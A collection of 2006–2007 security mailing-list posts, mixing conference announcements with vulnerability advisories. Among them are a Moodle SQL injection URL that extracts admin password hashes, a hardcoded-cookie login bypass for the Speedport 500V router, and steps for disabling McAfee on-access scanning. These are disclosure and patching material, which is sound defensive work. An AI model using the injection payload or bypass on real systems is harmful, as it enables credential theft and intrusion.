dear all besides having free alcohol for all conference attendees at SyScan'07 this year, there will be seven (7) training classes at SyScan'07 this year. these classes are: 1. "securing your oracle database form hackers" by alexander kornbrust 2. "web application (in)security" by ngs software 3. "designing a secured voip network" by hendrik scholz 4. "practical wifi (in)security" by cedric blancher 5. "penetration testing voip network" by the grugq 6. "network storage security training" by isec partners 7. "building secured asp.net applications" by cosaire training classes will be held on july 3rd - 4th, 2007 and the main conference will be held on july 5th - 6th, 2007. those who sign up for these training classes by may 20th, 2007 will get to attend the conference for free. those who sign up for these classes after may 20th, 2007 need to pay only S$300 (about us$200) for the conference. please visit www.syscan.org for more details. -- Thank you Thomas Lim Organiser SyScan'07 www.syscan.org
SyScan'07 - Call for Paper - NEW UPDATES
dear all here are some updates to the SyScan'07 call for paper: 1. new topic. The following topics will be included: a. Web 2.0 - web services, PHP, .Net, web applications 2. Speakers' Privileges. a. Speakers at SyScan'07 with a brand new presentation will receive S$500 cash. b. Selected speakers will get a chance to present at conferences either in Korea or India. ** *CALL FOR PAPER/TRAINING* *ABOUT SYSCAN'07* The Symposium on Security for Asia Network (SyScan) aims to be a very different security conference from the rest of the security conferences that the information security community in Asia has come to be so familiar and frustrated with. SyScan intends to be a non-product, non-vendor biased security conference. It is the aspiration of SyScan to congregate, in Singapore, the best security experts in their various fields, to share their research, discovery and experience with all security enthusiasts in Asia. Besides main the conference, there will also be specialized security training courses in SyScan'07. These classes will be held before the main conference. SyScan'07 will be held in Singapore over at the Swissotel Merchant Court Hotel. The main conference will be held on 5th and 6th of July and the training will be held on 3^rd and 4^th of July, 2007. *CFP Committee* The Call for Paper committee for SyScan'07 comprises of the following personnel: 1. Thomas Lim - Organiser of SyScan and CEO of COSEINC 2. Dave Aitel - Founder of Immunitysec 3. Marc Maiffret - Founder and Chief Hacking Officer of eEye 4. Matthew "Shok" Conover - Symantec 5. Ong Geok Meng - McAfee The CFP committee will review all submissions and determine the final list of speakers for SyScan'07. *Speakers* *Speakers' Privileges:* * Return economy class air-ticket for one person. * 3 nights of accommodation. * Breakfast, lunch and dinner during conference. * After-conference party. * A very healthy dose of alcohol and fun. * S$500 cash for speakers with brand new presentation. * Selected speakers will get a chance to present in Korea and India at the end of the year. *Topics* The focus for SyScan'07 will include the following: */Operating Systems/* * Vista * Linux */Mobile Devices/Embedded systems/* * SmartPhones * PDAs * Game Consoles */Networking/Telecommunication/* * VoIP * 3G/3.5G network * IPv6 * WLAN/WiFi * GPRS */Industry specific/* * Banking and Financial Services sectors */Malware/* */BotNets/* /*/Web 2.0/* * Web services * PHP * .Net * Web applications / Any topics that will catch the attention of the CFP committee and/or the world. *TRAINERS* *Trainers' Privileges:* * 50% of net profit of class. * 2 nights of accommodation (conference). * After-conference party. * A very healthy dose of alcohol and fun. Please note that the net profit for each class is determined by the difference between the total fee collected for each class and the total expenses incurred for each class. The expenses of each class would include the return economy air-ticket of the trainer, 3 nights of accommodation (training) and the rental of the training venue. *Topics* SyScan'07 training topics will focus on the following areas: Web Applications * .Net applications * Java applications Networks * VoIP * 3G/3.5G network * IPv6 * WLAN/WiFi * GPRS Databases Storage *CFP Submission:* CFP submission must include the following information: 1) Brief biography including list of publications and papers published previously or training classes conducted previously. 2) Proposed presentation/training title, category, synopsis and description. 3) Contact Information (full name, alias, handler, e-mail, postal address, phone, fax, photo, country of origin, special dietary requirement). 4) Employment and/or affiliations information. 5) Any significant presentation and educational/training experience/background. 6) Why is your material different or innovative or significant or an important tutorial? Please note that all speakers will be allocated 50 minutes of presentation time. Any speakers that require more time must inform the CFP committee during the CFP submission. Rraining class will be 2 full days. Please inform the CFP committee if your class is shorter or longer than 2 days during your CFP submission. All submission must be in English in either MS Office or PDF format. The more information you provide, the better the chance for selection. Please send submission to [EMAIL PROTECTED] <mailto:[EMAIL PROTECTED]>. Submission for trainers must be done no later than 30th March 2007. Submission for speakers must be done no later than 30th April 2007. *Important Dates* Final CFP Submission (Trainers) - 30th March 2007 Final CFP Submission (Speakers) - 30th April 200
Re: Wordpress <= v2.1.0
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 take a look at http://codex.wordpress.org/Roles_and_Capabilities By design the administrator can post anything ... even js/html [EMAIL PROTECTED] wrote: > If you're logged in into wordpress as an admin, your comments aren't properly > sanitized, thus allowing an XSS to be posted. This can be exploited using > XSRF techniques. > > More info & PoC: http://www.virtuax.be/advisories/Advisory4-20022007.txt - -- Regards Vladimir Vitkov Operations Team -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.5 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFF7SZYoiOVExCFVC0RAgMfAKC62x+mbjzHlhTEQn3QZg9IIyJokgCgmf9w G2DDt/YPlrn22KDNzWGbJx4= =UJPB -END PGP SIGNATURE-
VMware Workstation multiple denial of service and isolation manipulation vulnerabilities
"modify" setup mode. 2.2.3. In the components section - choose to remove only the "Toolbox" component and continue with the setup. Restart the guest OS if asked to. 2.3. This step will remove the Toolbox files from their original locations, any related registry values and the "VMware tools service" service. The anti-manipulation "Lockout" feature (VM Workstation interface -> Edit menu -> Preferences command -> Lockout tab) has been tested and is affecting only the access to the interface of VMware workstation, thus only from "outside" of the running VM, from the host OS - so it can't help with the issues mention in this advisory. Vendor Notification: The vendor was notified at the end of September 2006, but it could not commit to any planned date for a fix regarding any of this issues. Credit: Eitan Caspi Israel Email: [EMAIL PROTECTED] Past security advisories: 1. http://www.microsoft.com/technet/security/bulletin/MS02-003.mspx http://support.microsoft.com/kb/315085/en-us http://online.securityfocus.com/bid/4053 2. http://support.microsoft.com/?kbid=329350 http://online.securityfocus.com/bid/5972 3. http://www.securityfocus.com/archive/1/301624 http://online.securityfocus.com/bid/6280 4. http://online.securityfocus.com/archive/1/309442 http://online.securityfocus.com/bid/6736 5. http://www.securityfocus.com/archive/1/314361 http://www.securityfocus.com/bid/7046 6. http://www.securityfocus.com/archive/1/393800 7. http://www.securityfocus.com/archive/1/archive/1/434704/100/0/threaded 8. http://www.securityfocus.com/archive/1/archive/1/446220/100/0/ 9. http://www.securityfocus.com/archive/1/459140/30/90/threaded http://www.securityfocus.com/bid/22413 Articles: You can find several articles I have written (translated to English) at http://www.themarker.com/eng/archive/one.jhtml (filter: Author = Eitan Caspi (second names set), From year = 2000 , Until year = 2002) Eitan Caspi Israel Current Blog (Hebrew): http://blog.tapuz.co.il/eitancaspi Past Blog (Hebrew): http://www.notes.co.il/eitan Dead Blog (English): http://eitancaspi.blogspot.com "Technology is like sex. No Hands On - No Fun." (Eitan Caspi)
Vmare workstation guest isolation weaknesses (clipboard transfer)
ext is the same as the one copied from the host OS. 7. Turn off the "Enable copy and paste to and from this virtual machine" from the VM settings and click OK. 8. Repeat steps 3 to 6 and verify you are able to perform them, although the relevant option is now "disabled". 9. You can repeat steps 1 to 8 but this time in the other way round, by starting with the check box as un-checked. 10. Activate the change by performing one of the following operations towards the guest OS: either suspend and resume, reset (from the VMware hosting application), restart (from within the guest OS), shutdown (either from within the guest OS of by performing a "power off" from the VMware hosting application) and then turning it back on. After performing either operation make sure the change was applied. Issue 2: 1. When the test VM is turned off (one with the "VMware tools" pre-installed), make sure the "Enable copy and paste to and from this virtual machine" checkbox is checked (VM settings -> "Options" tab -> "Guest Isolation" line -> "Enable copy and paste to and from this virtual machine"). 2. Turn on the VM and log into the guest OS. 3. Move the focus the host OS and copy the word "password". 4. Move to the focus to the guest OS and paste the clipboard into any text field. 5. Make sure the word "password" is displayed. 6. Move back to the host OS and clear the clipboard content. Make sure it is clear by pasting its content to a text field and verify nothing was pasted. 7. Move the focus to the guest OS and then back to the host OS and again perform a paste action to a text field. 9. Verify that now the clipboard has pasted the word "password". Exploit Code: No need. Direct resolution: Not any that I am aware of at the time of writing this advisory. Workarounds: Issue 1: No workaround was found. Issue 2: Disabling the clipboard transfer on a global level, for all of the VMs immediately - by clearing the following checkbox in VMware workstation interface: "Edit" menu -> "Preferences" command -> "Input" tab -> "Enable copy and paste to and from virtual machine". If this global option is turned off, than at each VM level, clipboard copy, in any direction, will not be allowed, regardless of the current actual clipboard copy status at each VM. Remember that this option effects ALL of the virtual machines used within the VMware workstation. Vendor Notification: The vendor was notified at the end of September 2006, but it could not commit to any planned date for a fix regarding both issues. Credit: Eitan Caspi Israel Email: [EMAIL PROTECTED] Past security advisories: 1. http://www.microsoft.com/technet/security/bulletin/MS02-003.mspx http://support.microsoft.com/kb/315085/en-us http://online.securityfocus.com/bid/4053 2. http://support.microsoft.com/?kbid=329350 http://online.securityfocus.com/bid/5972 3. http://www.securityfocus.com/archive/1/301624 http://online.securityfocus.com/bid/6280 4. http://online.securityfocus.com/archive/1/309442 http://online.securityfocus.com/bid/6736 5. http://www.securityfocus.com/archive/1/314361 http://www.securityfocus.com/bid/7046 6. http://www.securityfocus.com/archive/1/393800 7. http://www.securityfocus.com/archive/1/archive/1/434704/100/0/threaded 8. http://www.securityfocus.com/archive/1/archive/1/446220/100/0/ Articles: You can find some articles I have written at http://www.themarker.com/eng/archive/one.jhtml (filter: Author = Eitan Caspi (second name set), From year = 2000 , Until year = 2002) Eitan Caspi Israel Current Blog (Hebrew): http://blog.tapuz.co.il/eitancaspi Past Blog (Hebrew): http://www.notes.co.il/eitan Dead Blog (English): http://eitancaspi.blogspot.com "Technology is like sex. No Hands On - No Fun." (Eitan Caspi) -- No virus found in this outgoing message. Checked by AVG Free Edition. Version: 7.5.432 / Virus Database: 268.17.22/666 - Release Date: 03/02/2007 15:31
Re: Virginity Security Advisory 2007-001 : T-Com Speedport 500V Login bypass
Since this is not the first security problem on this router, and Deutsche Telekom really does not care, I advice everyone to use alternative means of routing / dialing up. The modem shipped in conjunction with this router requires VLAN support. Dialup requests will only be served on VLAN.7 More information can be found on man-wiki, althought it deals with the 700V, which has the same security problems, it also applies to the 500V version. href="http://man-wiki.net/index.php/T-Home_IPTV_without_speedport_W_700V";>man-wiki and href="http://man-wiki.net/index.php/T-Home_IPTV_over_wireless_bridge";>man-wiki On Linux a "vconfig add eth0 7" will allow you to dial up without the Speedport 500V Regards, http://www.mohammadkhani.eu/";>Amir Mohammadkhani [EMAIL PROTECTED] schrieb: - - - Virginity Security Advisory 2007-001 - - - DATE : 2007-01-19 15:32 GMT TYPE : remote VERSIONS AFFECTED : T-Com Speedport 500V Firmware 1.31 AUTHOR : Virginity ADVISORY NUMBER : 005 - - - Description: The Speedport 500V is a broadband-router which is sold in germany along with ADSL lines. (just so you know) The system is stupid and verifies wether you have entered the correct password by setting a cookie with the content LOGINKEY=TECOM (this is hardcoded and can not be changed) If an attacker simply creates this cookie he can bypass password authentication by simply calling the configuration html sites directly. The attacker then has nearly full system access (you cannot change the system password without knowing the old one) and can change system configuration e.g. disable the firewall. You can also perform a firmware upgrade, which allows you to reset the password to the default one, which now gives you full system access. Vendor has not been notified. I don't think they care^^. - - - Example: Create a cookie like this: Name: LOGINKEY Content: TECOM Host: <- replace this by your routers ipaddress ;) Path: / Expires: Never create a html page like this and open it in your browser: this will bypass the login screen and lead you directly to configuration menu. - - - Workaround: Download the Sourcecode from the vendor (GPL), replace TECOM with something else, try bulding it, and then try installing it on the hardware. i did not try this. its stupid and does not really solve the problem. - - - Personal note: Still here... sadly not dead yet. maybe i should hack the NSA so they kill me? *lol* guess i'd have to learn some real things greetz to s. and that other admin. - - -
[NGSEC] ngGame #3 - BrainStorming
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 NGSEC is proud to announce its third security game: "NGSEC's Security Game #3 - BrainStorming" About NGSEC Games: - -- NGSEC's games are a set of security challenges useful for anyone interested in security or hacking. At the Games you'll be presented a set of challenges you'll have to solve in order to gain access to each following stage. About Game #3: - -- NGSEC's Security Game #3 - BrainStorming has 5 levels. Difficulty grows every level, so first levels are very, very easy. On each level you will be presented a form asking you to authenticate. You do not know the user and the password, the goal is to bypass the authentication mechanism. Please note you are NOT allowed to: - Hack the game-server. - Brute force the authentication mechanism. By playing this game, you accept and agree these simple rules. Start playing NGSEC's Games at: http://quiz.ngsec.com/ Please note ngGame #3 has the launch date in a few hours "01-Jan-2007" 00:01 Madrid's time. - -- Next Generation Security S.L. - NGSEC http://www.ngsec.com C\O´Donnell nº 46, 3ºB 28009 Madrid Spain Tel: +34 91 837 19 91 Fax: +34 91 577 84 45 Find NGSEC labs public key at: http://www.ngsec.com/pgp/labs.asc -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.5 (GNU/Linux) iD8DBQFFl+C1KrwoKcQl8Y4RAlUyAJ9jkExKJB4LZS7KdpQJPTm4ChfPLQCfb7NN 2cGHVqBEcaNZhyYf/tBDpWI= =gKdp -END PGP SIGNATURE-
Re: Multiple Vendor Unusual MIME Encoding Content Filter Bypass
Tomasz Kojm wrote: > That's _extremely_ irresponsible to disclose bugs without giving the vendors > any chance to fix them and prepare new software releases. bla bla bla, full disclosure is cheaper i really hate responsible disclosure criers, it's a personal choice, you can't cry if somebody wants to do that different we are speaking about MIME!! don't you think that an AV should be aware of this? and about the BOF.. who cares.. the interesting part here is the mime trick not the clamav dos very interesting paper Hendrik regards, Michele Sandrelli
Re: [Full-disclosure] SQL injection - moodle
A security vulnerability was recently discovered in all versions of Moodle 1.6 and later that allows SQL injection. A quick one-line fix has already been added to CVS to patch this problem for 1.6.x and 1.7 versions. Update your servers using CVS as soon as possible, or edit the file blog/index.php in your copy manually as described here: http://cvs.moodle.com/blog/index.php?r1=1.18.2.2&r2=1.18.2.3 Att, Silvio Cesar L. dos Santos Analista de Redes Pleno DTI - Divisão de Tecnologia da Informação UNIGRANRIO - Universidade do Grande Rio +55 21 2672-7720 [EMAIL PROTECTED] [EMAIL PROTECTED] http://www.unigranrio.br disfigure wrote: > // > http://www.w4cking.com > > Product: > moodle 1.6.2 > http://www.moodle.org > > Vulnerability: > SQL injection > > Notes: > - SQL injection can be used to obtain password hash > - the moodle blog "module" must be enabled > - guest access to the blog must be enabled > > POC: > /blog/index.php?tag=x%2527%20UNION%20SELECT%20%2527-1%20UNION%20SELECT%201,1,1,1,1,1,1,username,password,1,1,1,1,1,1,1,username,password,email%20FROM%20mdl_user%20RIGHT%20JOIN%20mdl_user_admins%20ON%20mdl_user.id%3dmdl_user_admins.userid%20UNION%20SELECT%201,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1%20FROM%20mdl_post%20p,%20mdl_blog_tag_instance%20bt,%20mdl_user%20u%20WHERE%201%3D0%2527,1,1,%25271 > > > Original advisory (requires registration): > http://w4ck1ng.com/board/showthread.php?t=1305 > // > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ >
McAfee VirusScan Enterprise - disabling the client side "On-Access Scan"
Suggested Risk Level: Low Type of Risk: Disabling security component. Affected Software: VirusScan Enterprise 7.1.0 (client side, managed centrally by ePolicy Orchestrator), Scan Engine: 4.4.00, the "VirusScan On-Access Scan" component. OS Environment: Windows 2000 workstation w/SP4 and all the up-to-date windows update security and operational patches (May be valid on Windows XP as well, but was not tested on XP). Local / Remote activated: Local. Summary: A McAfee administrator can choose to prevent a local user of the VirusScan client to disable the "On-Access Scan" (the real-time memory virus monitoring and cleaning component) by making the "disable" button un-active within the "VirusScan On-Access Scan Statistics" dialog box. But, just after a user logs on locally to the desktop, and after any period of time, until the first time the "VirusScan On-Access Scan Statistics" dialog box is opened – the user can double click the "VirusScan On-Access Scan" icon on the task bar and then the "disable" button will be active for about 5 seconds, a sufficient time for the user to press the this button. After pressing the "disable" button, the button will change its interface text to "enable", the "On-Access Scan" icon will present a "no entrance" sign, stating it is disabled, and the "Network Associates McShield" service will be in a "paused" mode. Once the 5 seconds period has passed – the button will become disabled (grayed out) in whatever state it is at that time, stabilizing the "On-Access Scan" component to its last state, which is one of two: 1. The button was not pressed -> Button shows "disable" ; the "On-Access Scan" is active and the "Network Associates McShield" service will be in a "started" mode. 2. The button was pressed -> Button shows "enable" ; the "On-Access Scan" is disabled and the "Network Associates McShield" service will be in a "paused" mode. I rated this issue as "low" because it is mostly an interface related issue, and the user must be a member of a local users group that can pause a service, i.e. "power users" or "Administrators", which are the most privileged users groups in the OS. This issue is relevant only in a cases where the OS, particularly the interface, was heavily hardened (especially preventing access to the "services" console and preventing running any command line interface), but the user has access to the "VirusScan On-Access Scan Statistics" dialog box and is a member of the "power users" or "Administrators" groups. Possible Abuses: Disabling the VirusScan real-time virus protection, exposing the OS to virus infection. Reproduction: 1. Make sure the VirusScan policy is prohibiting users from disabling the "On-Access Scan" component. 2. Log on locally to the OS with a user that is a member of the "power users" or "administrators" group. 3. Wait any period time you wish. 4. Double click the "VirusScan On-Access Scan Statistics" icon placed on the task bar. 5. Click the "disable" button within 5 seconds. 6. Wait a few seconds for the button to gray out, stabilizing the "On-Access Scan" component in a "disabled" mode. Exploit Code: No need. Direct resolution: None at the time of publishing this advisory. Workarounds: Enable the "Do not show the system tray icon" policy option – to prevent your users from opening the "VirusScan On-Access Scan Statistics" dialog box, and thus prevent them from reaching the "disable" button. (Using this workaround may alarm the users that the sudden absence of the icon is a sign of a possible harm to the virus protection and thus initiating multiple support calls). Vendor Notification: McAfee was notified in May 2006 and has approved my findings. McAfee choose to include a fix for this issue as part of a major product update, which is scheduled to be released in the coming month/months. Credit: Eitan Caspi Israel Email: [EMAIL PROTECTED] Past security advisories: 1. http://online.securityfocus.com/bid/4053 http://www.microsoft.com/technet/security/bulletin/MS02-003.mspx http://support.microsoft.com/kb/315085/en-us 2. http://online.securityfocus.com/bid/5972 http://support.microsoft.com/?kbid=329350 3. http://online.securityfocus.com/bid/6280 http://www.securityfocus.com/archive/1/301624 4. http://online.securityfocus.com/bid/6736 http://online.securityfocus.com/archive/1/309442 5. http://www.securityfocus.com/bid/7046 http://www.securityfocus.com/archive/1/314361 6. http://www.securityfocus.com/archive/1/393800 7. http://www.securityfocus.com/archive/1/archive/1/434704/100/0/threaded Articles: You can find some a
ToorCon Pre-Registration Closing Friday!
PRE-REGISTRATION CLOSING ON FRIDAY, SEPTEMBER 15TH Don't miss out on the discounted rates for attending ToorCon 8, San Diego's exclusive hacker convention, going on from September 29th through October 1st. [http://www.toorcon.org] GENERAL ADMISSION Currently general admission is only $80 which will increase to $120 at the door. [http://www.toorcon.org/2006/conference.html] DEEP KNOWLEDGE SEMINARS We are also offering Deep Knowledge Seminars, targeted towards the corporate hackers and decision makers, for only $800 which will increase to $1,000 at the door. [http://www.toorcon.org/2006/seminars.html] HARDWARE HACKING & WIRELESS MESH WORKSHOPS This is our first year of hands-on workshops which provide a crash-course in hardware hacking and hacking wireless mesh networks. The workshops are only $1,200 right now, which includes all of the hardware and tools needed, and will increase to $1,600 at the door if there are any seats left. Seats are quickly running out for both the Workshops and the Seminars so make sure you register soon! [http://www.toorcon.org/2006/workshops.html] PRE-REGISTRATION This is your last chance to pre-register and save on your admission to the conference. Pre-registration also includes a free ToorCon 8 T-shirt and express registration at the conference. [http://www.toorcon.org/2006/registration.html]
ToorCon 8 Call for Papers Closing Tomorrow & Workshops/Seminars Added
CALL FOR PAPERS CLOSING! Just wanted to let you know that the ToorCon 8 CFP will be closing at the end of Friday, August 18th (tomorrow). If you're interested in submitting, please make sure you get your submissions in before midnight tomorrow. For more info, check out the CFP at: http://www.toorcon.org/2006/cfp.html SWEET ASCII/ANSI ART CFP SUBMISSIONS! To check out some of the really sweet submissions we've received (in all of their ascii/ansi art glory), check out some of the following links: aempirei http://toorcon.org/2006/cfp/aempirei.html vlad902 http://toorcon.org/2006/cfp/vlad902.c.txt spoonm http://toorcon.org/2006/cfp/spoonm.html Tom St Denis (requires Firefox) http://toorcon.org/2006/cfp/tomstdenis.html asm http://toorcon.org/2006/cfp/asm/ Gabriel Lawrence & Patrick Nehls http://toorcon.org/2006/cfp/glawrence.html Tom Cross http://toorcon.org/2006/cfp/tcross.txt GENERAL CONFERENCE Currently, the general conference is $70 to pre-register, which will increase to $80 on September 1st. We haven't posted any talks yet, but should have the finalized schedule up by Monday, August 21st. DEEP KNOWLEDGE SEMINARS This year we will once again be having the Deep Knowledge Seminars on Friday, September 29th, right before the general conference. We are currently still working on the lineup, which will consist of 5 90 minute sessions, but are offering this as a more corporate oriented session and limiting the attendance to 20 people. The current pre-registration price is $500, but is reduced to $300 if you register in conjunction with a Workshop. The prices will be increasing to $800 on September 1st, and will be $1,000 at the door, so pre-register soon! WORKSHOPS We are also proud to announce that we are having 2 hands-on workshops this year: ~ Hardware Hacking Workshop ~ Instructor: bunnie Dates: Monday, October 2nd, 2006 Price: $900 Availability: 9 seats remaining Includes: Secret-bunnie-hardware, Soldering toolkit, & Cables This one-day workshop will introduce you to the basics of embedded processor hacking. In this unique workshop, you will get to hack a commercial embedded system for a product to be launched in Late August. The workshop will be held by the embedded electronics' designer. As a result, material will be presented from two perspectives when relevant: from that of a designer, and from that of a hacker. The workshop will begin with an overview of the hardware, and the design process that went into the hardware. Then, we will delve into the backdoors built into the product that can be used to commandeer the hardware for your purposes. You will learn several methods for attacking the embedded OS. Finally, you will build and add a small sensor module to the hardware. The workshop will conclude with the briefest introduction to writing drivers for this sensor module in Linux. We assume that the workshop attendee has minimal to no familiarity with hardware, but is fluent in C and assembly, and has a solid understanding of Linux OS fundamentals. ~ Building/Hacking Open Source Embedded Wireless Mesh Routers ~ Instructor: Ken Caruso & Matt Westervelt Dates: Monday, October 2nd, 2006 Price: $900 Availability: 8 seats remaining Includes: Soekris AP, Wireless Card, Case, & Antenna This class will take a very effective approach to teach you the basics of embedded hacking and wireless mesh. First we give you your own embedded wireless box to work on (which you take home at the end of the class). Second we teach you how to bootstrap it with an operating system while keeping it within the 64megabyte space limitation on the device. Third we teach you how to take this platform and make it part of a wireless mesh network using three different Open Source mesh implementations. Fourth we cover security issues with these protocols, how to mitigate and how to take advantage of them. SPONSORS We are finalizing our list of vendors and sponsors, so if you are interested in sponsoring, please contact us soon! We have our sponsorship rates posted up at http://www.toorcon.org/2006/sponsors.html and don't hesitate to reply to this email to discuss the different options. GENERAL INFO Located in sunny San Diego during September for the past 8 years, ToorCon has been providing a meeting place for many of the top hackers and security professionals from all around the world to get together and discuss today's bleeding edge issues. ToorCon's main goal is to provide a low cost conference with a high quality atmosphere. This year we are still aiming to provide the same highly technical lectures you've come to know and love, but also set the theme as "Bits & Bites" which will highlight the low level skills of the trade and focus on Reverse Engineering, Protocol Analysis, Cryptography, Hardware Hacks, and other nifty bit-twiddling and byte munging techniques. ToorCon 8: Bits & Bites September 29th-October 2nd, 2006 San Diego Convention Center Rooms 24-26 111 W. Harbor Drive San Diego, CA 92101 http:
ToorCon 2006 Call for Papers
ToorCon 2006 Call for Papers - Issued June 6th 2006 Papers and presentations are being accepted for ToorCon 2006 to be held at the Convention Center in San Diego, CA on September 29th-October 1st. Please email your submissions to cfp [at] toorcon.org; submissions will be accepted until August 18th, 2006. About ToorCon ToorCon is just around the corner again this year. In its 8th running year, it is still San Diego's exclusive hacker convention, bringing together Southern California's hacker community year after year to attend the high quality presentations and participate in the annual festivities. This year we are still aiming to provide the same highly technical lectures you've come to know and love, but also set the theme as "Bits & Bites" which will highlight the low level skills of the trade and focus on Reverse Engineering, Protocol Analysis, Cryptography, Hardware Hacks, and other nifty bit-twiddling and byte munging techniques. Once again, we will be offering an intensive full-day Deep Knowledge Seminar on Friday the 29th that we are also accepting submissions for. Submission of Papers ToorCon only accepts talks on new technologies and methodologies that have been recently developed. We will not accept papers that have already been presented prior to 2006, unless they present fundamental concepts or conform to any of the outlined topics below. Special consideration will be given to papers addressing the following topics: * Reverse Engineering * Protocol Analysis * Cryptography * Hardware Hacks * Anything related to Bits & Bites, the number 8, and/or includes a sweet ascii/ansi art demo :-) All conference talks should be 50 minutes in length including time for delegate participation and questions at the end of the presentation. Deep Knowledge Seminar talks should be 90 minutes in length and should include hands-on participation for an audience of 25-35 people. Inclusion of any talk related tools, white papers or source code will help during the selection process. While we try to facilitate speakers' requests for equipment, we may not be able to accommodate all requests. In cases where we cannot guarantee special equipment the speaker is expected to supply hardware and/or software. Each speaker is also expected to bring their own laptop to display their presentation. All talks must be vendor neutral, while speakers are welcome to present on behalf of a company - sales pitches will be thrown out. Remuneration For each chosen presentation ToorCon will give the speaker and 1 guest free admission to the conference, admission to the Deep Knowledge Seminars (limited to the first 10 speakers to request admission), and lots of free drinks :-). Speaker Requirements Please include the following information with your submission: 1. What title you are submitting your paper under. 2. A valid e-mail address AND telephone number where you can be reached. 3. Number of people that will be presenting. 4. A brief description of your talk and what will be presented 5. A brief biography on why you are qualified to speak on your topic. This and your description will be used on toorcon.org as well as in any press material for the conference. 6. If you are speaking under a company name, please specify for which company you work. 7. Will your talk include a sweet ascii/ansi art demo? 8. Would you like to be considered for speaking at the Deep Knoweldge Seminars? For an example of a good submissions, see: * Chris Abad - http://toorcon.org/2006/cfp/aempirei.html * Tom St Denis - http://toorcon.org/2006/cfp/tomstdenis.html Note that by presenting at ToorCon 2006 you grant ToorCon permission to reproduce, distribute and/or advertise your talk as seen fit. If your talk is accepted and because of some emergency you are unable to speak, you must notify ToorCon within 24 hours of your talk, otherwise ToorCon reserves the right to tell all the other fellow hacker cons how you ditched out at the last minute and take it into consideration the next time you submit a talk :). Location Information This year's event will be held at the San Diego Convention Center. The reception and conference will take place on September 29th-October 1st in meeting rooms 24-26 at the San Diego Convention Center's (front) upper level. September 29th-October 1st, 2006 San Diego Convention Center 111 W. Harbor Drive San Diego, CA 92101 http://sdccc.org Important Dates June 6th, 2006: Official Call For Papers issued July 28th, 2006: First round of selection announced August 18th, 2006: Call for Papers closes September 8th, 2006: Final material submission for collateral September 29th, 2006: ToorCon 2006
ATutor : Cross-Site Scripting Vulnerabilities
- [#] Security Advisory #4 [^] http://securitynews.ir/ [>] Advisory Title: ATutor : Cross-Site Scripting Vulnerabilities [EMAIL PROTECTED] Author : bug [EMAIL PROTECTED] securitynews.ir [$] Product Vendor : http://www.atutor.ca/ [.] Affected Versions : 1.5.3 RC2 (and maybe before) [/] Release Date : 07/07/2006 - [*] Overview : ATutor is an Open Source Web-based Learning Content Management System (LCMS) . There are several XSS bugs in ATutor 1.5.3 RC2 . Affected files are : /admin/create_course.php, /users/create_course.php, /documentation/admin/index.php, /password_reminder.php, /users/browse.php, /admin/fix_content.php . [*] Details : No exploitable details are going to be released . [*] Solution : Upgrade to version 1.5.3 : http://www.atutor.ca/atutor/download.php -- http://securitynews.ir/advisories/atutor153rc2.txt
phpMyAdmin : Cross-Site Scripting Vulnerability
--- [#] Security Advisory #3 [^] http://securitynews.ir/ [>] Advisory Title: phpMyAdmin : Cross-Site Scripting Vulnerability [EMAIL PROTECTED] Author : bug [EMAIL PROTECTED] securitynews.ir [$] Product Vendor : http://www.phpmyadmin.net/ [.] Affected Versions : 2.8.1 (and maybe before) [/] Release Date : 06/30/2006 --- [*] Overview : phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL over the Web . A XSS bug has been found in phpMyAdmin 2.8.1 . [*] Details : No exploitable details are going to be released . [*] Solution : Upgrade to the new version (2.8.2) : http://www.phpmyadmin.net/home_page/downloads.php [*] References : http://www.phpmyadmin.net/home_page/security.php?issue=PMASA-2006-4 --- http://securitynews.ir/advisories/phpmyadmin281.txt
Claroline Cross-Site Scripting Vulnerabilities
-- [#] Security Advisory [^] http://securitynews.ir/ [>] Advisory Title: Claroline Cross-Site Scripting Vulnerabilities [EMAIL PROTECTED] Author : bug [EMAIL PROTECTED] securitynews.ir [$] Product Vendor : http://www.claroline.net/ [.] Affected Versions : 1.7.7 (and maybe before) [/] Release Date : 06/26/2006 -- [*] Overview : Claroline is a free application based on PHP/MySQL allowing teachers or education organizations to create and administrate courses through the web . Several cross-site scripting bugs have been found in Claroline 1.7.7 . [*] Details : No exploitable details are going to be released . [*] Solution : Vendor contacted on 06/25/2006. The vendor has been released a security patch : http://www.claroline.net/dlarea/claroline.patch17701.zip -- http://securitynews.ir/
[SNS Advisory No.88] Webmin Directory Traversal Vulnerability
-- SNS Advisory No.88 Webmin Directory Traversal Vulnerability Problem first discovered on: Sun, 04 Jun 2006 Published on: Fri, 23 Jun 2006 -- Severity Level: --- Medium Overview: - Webmin for Windows contains directory traversal vulnerability that allows remote attackers to download arbitrary files without authentication. Problem Description: Webmin is a web-based system administration tool for Unix, MacOS X and Windows platform. Webmin 1.270 and earlier versions does not properly handle "\" (backslash). On Windows platform, this allows attackers to access outside of the public directory and files. In default configurations of Webmin, it is required authentication to access almost directories under top page. But there are some directories where is not required authentication to access. For example, the directory which stores the image used before login. Therefore, by exploiting directory traversal vulnerability from these directories, the vulnerability allows remote attackers to download the contents of arbitrary files without authentication. Affected Versions: -- Webmin (on Windows) Version 1.270 and earlier versions Solution: - This problem can be addressed by upgrading Webmin to 1.280 or later. http://www.webmin.com/ Discovered by: -- Keigo Yamazaki (LAC) Thanks to: -- This SNS Advisory is being published in coordination with Information-technology Promotion Agency, Japan (IPA) and JPCERT/CC. http://jvn.jp/jp/JVN%2367974490/index.html http://www.ipa.go.jp/security/vuln/documents/2006/JVN_67974490_webmin.html Disclaimer: --- The information contained in this advisory may be revised without prior notice and is provided as it is. Users shall take their own risk when taking any actions following reading this advisory. LAC Co., Ltd. shall take no responsibility for any problems, loss or damage caused by, or by the use of information provided here. This advisory can be found at the following URL: http://www.lac.co.jp/business/sns/intelligence/SNSadvisory_e/88_e.html --
TikiWiki Sql injection & XSS Vulnerabilities
